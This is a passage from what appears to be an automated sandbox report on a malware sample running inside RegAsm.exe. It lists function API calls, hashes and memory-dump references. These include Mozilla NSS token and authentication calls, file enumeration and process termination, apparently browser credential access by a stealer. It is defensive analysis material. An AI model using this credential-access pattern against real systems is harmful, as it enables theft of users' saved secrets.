                                                                                                        • Instruction Fuzzy Hash: 5E3107B6B0020E4BEB01DA69DC85BEFB3B8EF45359F040329EC15A7681DB34D90586A2
                                                                                                        Function 6C0D6470 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6C0D82BC,?,?), ref: 6C0D649B
                                                                                                          • Part of subcall function 6C0ACA10: malloc.MOZGLUE(?), ref: 6C0ACA26
                                                                                                        • memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0D64A9
                                                                                                          • Part of subcall function 6C0CFA80: GetCurrentThreadId.KERNEL32 ref: 6C0CFA8D
                                                                                                          • Part of subcall function 6C0CFA80: AcquireSRWLockExclusive.KERNEL32(6C11F448), ref: 6C0CFA99
                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0D653F
                                                                                                        • free.MOZGLUE(?), ref: 6C0D655A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325466692.000000006C091000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C090000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325445154.000000006C090000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325754871.000000006C10D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325812764.000000006C11E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325838597.000000006C122000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c090000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 3596744550-0
                                                                                                        • Opcode ID: d43edaff5d9e46919b00223b1e30b27f49dd26d93e665ddaa0196b0157e29a2d
                                                                                                        • Instruction ID: ec02aa1e6cbbafe780698c8ad52c16316cd81059618583e01dcc8a2001bd8d9c
                                                                                                        • Opcode Fuzzy Hash: d43edaff5d9e46919b00223b1e30b27f49dd26d93e665ddaa0196b0157e29a2d
                                                                                                        • Instruction Fuzzy Hash: FC316DB5A043059FD704CF24D884B9EBBE5BF89314F01492EE89A97741DB34F919CB92
                                                                                                        Function 0041BD80 Relevance: 6.1, APIs: 4, Instructions: 91fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • malloc.MSVCRT ref: 0041BDC5
                                                                                                        • _memmove.LIBCMT ref: 0041BDD9
                                                                                                        • _memmove.LIBCMT ref: 0041BE26
                                                                                                        • WriteFile.KERNEL32(00000000,?,66F55C36,?,00000000,039E2548,?,00000001,039E2548,?,0041AE6B,?,00000001,039E2548,66F55C36,?), ref: 0041BE45
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memmove$FileWritemalloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 803809635-0
                                                                                                        • Opcode ID: f8d90d2511c155f796a90aa74a79be86cc9cbc5625099fdc230df8e4b929144d
                                                                                                        • Instruction ID: ef32b456043a7c40364d1b26fe1d6b34c9da03a70a3abd589478dda37aa5024c
                                                                                                        • Opcode Fuzzy Hash: f8d90d2511c155f796a90aa74a79be86cc9cbc5625099fdc230df8e4b929144d
                                                                                                        • Instruction Fuzzy Hash: FB318F75600704AFD765CF65E980BE7B7F8FB45740B40892FE94687A00DB74F9448B98
                                                                                                        Function 004122B0 Relevance: 6.1, APIs: 4, Instructions: 88COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 004122D7
                                                                                                          • Part of subcall function 00411D61: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00412301,?), ref: 00411D6C
                                                                                                          • Part of subcall function 00411D61: HeapAlloc.KERNEL32(00000000), ref: 00411D73
                                                                                                          • Part of subcall function 00411D61: wsprintfW.USER32 ref: 00411D84
                                                                                                        • OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 0041237D
                                                                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 0041238B
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00412392
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Process$Heap$AllocCloseHandleOpenTerminate_memsetwsprintf
                                                                                                        • String ID:
                                                                                                        • API String ID: 2224742867-0
                                                                                                        • Opcode ID: 8d2f111dba6cb19f7d8687405dc9f393da82ae6e0468ba9acff790c296a2a6c5
                                                                                                        • Instruction ID: d389cef70183d5cd616f040657d4303a3a928023e9a5c5ea90d08b3fb0bb435f
                                                                                                        • Opcode Fuzzy Hash: 8d2f111dba6cb19f7d8687405dc9f393da82ae6e0468ba9acff790c296a2a6c5
                                                                                                        • Instruction Fuzzy Hash: 6B314D72A0121CAFDF20DF61DD849EEB7BDEB0A345F0400AAF909E2550D6399F848F56
                                                                                                        Function 6C222880 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • NSS_CMSEncoder_Finish.NSS3(?), ref: 6C222896
                                                                                                        • NSS_CMSEncoder_Finish.NSS3(?), ref: 6C222932
                                                                                                        • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C22294C
                                                                                                        • free.MOZGLUE(?), ref: 6C222955
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Encoder_Finish$Arena_FreeUtilfree
                                                                                                        • String ID:
                                                                                                        • API String ID: 508480814-0
                                                                                                        • Opcode ID: 4c3797dd996de8e0fcfaf57a5c1f5c210b34315e7bbf66e4d74981588ad40802
                                                                                                        • Instruction ID: 17c3e43b17af0f0091aac7db2702206e1cd91669b481c2e172ae6d1f4538b881
                                                                                                        • Opcode Fuzzy Hash: 4c3797dd996de8e0fcfaf57a5c1f5c210b34315e7bbf66e4d74981588ad40802
                                                                                                        • Instruction Fuzzy Hash: FD21E2F66106099BE7208B26EC09F4377E9EF84369F140538EC89C7B60FB36E448C652
                                                                                                        Function 6C1F4FB0 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • TlsGetValue.KERNEL32(?,00000000,00000000,00000000,?,6C1FB60F,00000000), ref: 6C1F5003
                                                                                                        • EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,?,6C1FB60F,00000000), ref: 6C1F501C
                                                                                                        • PR_Unlock.NSS3(?,?,?,00000000,00000000,00000000,?,6C1FB60F,00000000), ref: 6C1F504B
                                                                                                        • free.MOZGLUE(?,00000000,00000000,00000000,?,6C1FB60F,00000000), ref: 6C1F5064
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalEnterSectionUnlockValuefree
                                                                                                        • String ID:
                                                                                                        • API String ID: 1112172411-0
                                                                                                        • Opcode ID: f6bff9a6a41ae4e28bdd580b49f67499b6f1c31d17d9bb4015be374ffb6b9f61
                                                                                                        • Instruction ID: 9adc5e788b1b476fe9018498a4c6cf5d8184386bcf5c9e084cce532f3d43861a
                                                                                                        • Opcode Fuzzy Hash: f6bff9a6a41ae4e28bdd580b49f67499b6f1c31d17d9bb4015be374ffb6b9f61
                                                                                                        • Instruction Fuzzy Hash: C13125B5A05A068FDB00EF68D48466AFBF4FF08304F118569D8A997700E730E991CBA2
                                                                                                        Function 0041665F Relevance: 6.1, APIs: 4, Instructions: 73stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                        • lstrcatA.KERNEL32(?,00000000), ref: 004166A7
                                                                                                        • lstrcatA.KERNEL32(?,00436B4C), ref: 004166C4
                                                                                                        • lstrcatA.KERNEL32(?), ref: 004166D7
                                                                                                        • lstrcatA.KERNEL32(?,00436B50), ref: 004166E9
                                                                                                          • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416018
                                                                                                          • Part of subcall function 00415FD1: FindFirstFileA.KERNEL32(?,?), ref: 0041602F
                                                                                                          • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB4), ref: 00416050
                                                                                                          • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB8), ref: 0041606A
                                                                                                          • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416091
                                                                                                          • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436647), ref: 004160A5
                                                                                                          • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160C2
                                                                                                          • Part of subcall function 00415FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 004160EF
                                                                                                          • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?), ref: 00416125
                                                                                                          • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD0), ref: 00416137
                                                                                                          • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 0041614A
                                                                                                          • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD4), ref: 0041615C
                                                                                                          • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 00416170
                                                                                                          • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160D9
                                                                                                          • Part of subcall function 00415FD1: FindNextFileA.KERNEL32(?,?), ref: 004162FF
                                                                                                          • Part of subcall function 00415FD1: FindClose.KERNEL32(?), ref: 00416313
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcat$wsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
                                                                                                        • String ID:
                                                                                                        • API String ID: 153043497-0
                                                                                                        • Opcode ID: c4f50c1d24547cc29a72e15d362f30183b109c2c9d9d5fb6f85994bd63f68b1a
                                                                                                        • Instruction ID: cfafa51994c6dd41316c3016dfe646ce489cf68115bfde9b3865c7b361435df3
                                                                                                        • Opcode Fuzzy Hash: c4f50c1d24547cc29a72e15d362f30183b109c2c9d9d5fb6f85994bd63f68b1a
                                                                                                        • Instruction Fuzzy Hash: FF21B57190021DAFCF54DF60DC46AD9B779EB08305F1040A6F549A3190EEBA9BC48F44
                                                                                                        Function 6C222DF0 Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PORT_ArenaMark_Util.NSS3(?), ref: 6C222E08
                                                                                                          • Part of subcall function 6C2114C0: TlsGetValue.KERNEL32 ref: 6C2114E0
                                                                                                          • Part of subcall function 6C2114C0: EnterCriticalSection.KERNEL32 ref: 6C2114F5
                                                                                                          • Part of subcall function 6C2114C0: PR_Unlock.NSS3 ref: 6C21150D
                                                                                                        • PORT_NewArena_Util.NSS3(00000400), ref: 6C222E1C
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6C222E3B
                                                                                                        • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C222E95
                                                                                                          • Part of subcall function 6C211200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C1B88A4,00000000,00000000), ref: 6C211228
                                                                                                          • Part of subcall function 6C211200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C211238
                                                                                                          • Part of subcall function 6C211200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C1B88A4,00000000,00000000), ref: 6C21124B
                                                                                                          • Part of subcall function 6C211200: PR_CallOnce.NSS3(6C312AA4,6C2112D0,00000000,00000000,00000000,?,6C1B88A4,00000000,00000000), ref: 6C21125D
                                                                                                          • Part of subcall function 6C211200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C21126F
                                                                                                          • Part of subcall function 6C211200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C211280
                                                                                                          • Part of subcall function 6C211200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C21128E
                                                                                                          • Part of subcall function 6C211200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C21129A
                                                                                                          • Part of subcall function 6C211200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C2112A1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
                                                                                                        • String ID:
                                                                                                        • API String ID: 1441289343-0
                                                                                                        • Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
                                                                                                        • Instruction ID: dcc75412747379929b09319436eff6306513142ca9858506d14ae56beba43e1f
                                                                                                        • Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
                                                                                                        • Instruction Fuzzy Hash: 6D2129B1D243494BE700CF149D44BAA37A46FA131DF110269ED085B752F7B6F598C291
                                                                                                        Function 6C1DACB0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CERT_NewCertList.NSS3 ref: 6C1DACC2
                                                                                                          • Part of subcall function 6C1B2F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C1B2F0A
                                                                                                          • Part of subcall function 6C1B2F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C1B2F1D
                                                                                                          • Part of subcall function 6C1B2AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6C1B0A1B,00000000), ref: 6C1B2AF0
                                                                                                          • Part of subcall function 6C1B2AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C1B2B11
                                                                                                        • CERT_DestroyCertList.NSS3(00000000), ref: 6C1DAD5E
                                                                                                          • Part of subcall function 6C1F57D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C1BB41E,00000000,00000000,?,00000000,?,6C1BB41E,00000000,00000000,00000001,?), ref: 6C1F57E0
                                                                                                          • Part of subcall function 6C1F57D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C1F5843
                                                                                                        • CERT_DestroyCertList.NSS3(?), ref: 6C1DAD36
                                                                                                          • Part of subcall function 6C1B2F50: CERT_DestroyCertificate.NSS3(?), ref: 6C1B2F65
                                                                                                          • Part of subcall function 6C1B2F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C1B2F83
                                                                                                        • free.MOZGLUE(?), ref: 6C1DAD4F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
                                                                                                        • String ID:
                                                                                                        • API String ID: 132756963-0
                                                                                                        • Opcode ID: 3db13e57048723b315566579b909b692553064747e060242769a59a3c742199a
                                                                                                        • Instruction ID: c2ff2a2218bafb774fafb4c1413c7351c2d7bbbadfa7782da75b19da9af7b24f
                                                                                                        • Opcode Fuzzy Hash: 3db13e57048723b315566579b909b692553064747e060242769a59a3c742199a
                                                                                                        • Instruction Fuzzy Hash: 6321E4B2D002188BEB10DF64D8055EEB7B8EF15218F5A4068DC44BB700FB31BA49CBE1
                                                                                                        Function 6C1DC860 Relevance: 6.1, APIs: 4, Instructions: 64threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PK11_IsLoggedIn.NSS3(?,?), ref: 6C1DC890
                                                                                                          • Part of subcall function 6C1D8F70: PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C1CDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C1D8FAF
                                                                                                          • Part of subcall function 6C1D8F70: PR_Now.NSS3(?,?,00000002,?,?,?,6C1CDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C1D8FD1
                                                                                                          • Part of subcall function 6C1D8F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C1CDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C1D8FFA
                                                                                                          • Part of subcall function 6C1D8F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C1CDA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C1D9013
                                                                                                          • Part of subcall function 6C1D8F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C1CDA9B,?,00000000,?,?,?,?,CE534353), ref: 6C1D9042
                                                                                                          • Part of subcall function 6C1D8F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C1CDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C1D905A
                                                                                                          • Part of subcall function 6C1D8F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C1CDA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C1D9073
                                                                                                          • Part of subcall function 6C1D8F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C1CDA9B,?,00000000,?,?,?,?,CE534353), ref: 6C1D9111
                                                                                                        • PR_GetCurrentThread.NSS3 ref: 6C1DC8B2
                                                                                                          • Part of subcall function 6C279BF0: TlsGetValue.KERNEL32(?,?,?,6C2C0A75), ref: 6C279C07
                                                                                                        • PK11_Authenticate.NSS3(?,00000001,?), ref: 6C1DC8D0
                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C1DC8EB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: K11_Value$CriticalEnterSectionUnlock$AuthenticateCurrentInternalItem_LoggedSlotThreadUtilZfree
                                                                                                        • String ID:
                                                                                                        • API String ID: 999015661-0
                                                                                                        • Opcode ID: 477a7ae121ca17423d818f87d30b67f1952193dc40be73abf14df5b980759708
                                                                                                        • Instruction ID: ba63161124c9700070a6ad218c7d70dfdcf43a9cee296c3a05ceeda6eb551a5b
                                                                                                        • Opcode Fuzzy Hash: 477a7ae121ca17423d818f87d30b67f1952193dc40be73abf14df5b980759708
                                                                                                        • Instruction Fuzzy Hash: 7E010876E012116BEB0029B96C90FBF3B799F5525CF060535FD04A6B01F762A8A883E2
                                                                                                        Function 6C20ECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6C20F0AD,6C20F150,?,6C20F150,?,?,?), ref: 6C20ECBA
                                                                                                          • Part of subcall function 6C210FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C1B87ED,00000800,6C1AEF74,00000000), ref: 6C211000
                                                                                                          • Part of subcall function 6C210FF0: PR_NewLock.NSS3(?,00000800,6C1AEF74,00000000), ref: 6C211016
                                                                                                          • Part of subcall function 6C210FF0: PL_InitArenaPool.NSS3(00000000,security,6C1B87ED,00000008,?,00000800,6C1AEF74,00000000), ref: 6C21102B
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6C20ECD1
                                                                                                          • Part of subcall function 6C2110C0: TlsGetValue.KERNEL32(?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C2110F3
                                                                                                          • Part of subcall function 6C2110C0: EnterCriticalSection.KERNEL32(?,?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C21110C
                                                                                                          • Part of subcall function 6C2110C0: PL_ArenaAllocate.NSS3(?,?,?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C211141
                                                                                                          • Part of subcall function 6C2110C0: PR_Unlock.NSS3(?,?,?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C211182
                                                                                                          • Part of subcall function 6C2110C0: TlsGetValue.KERNEL32(?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C21119C
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6C20ED02
                                                                                                          • Part of subcall function 6C2110C0: PL_ArenaAllocate.NSS3(?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C21116E
                                                                                                        • PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6C20ED5A
                                                                                                        Memory Dump Source
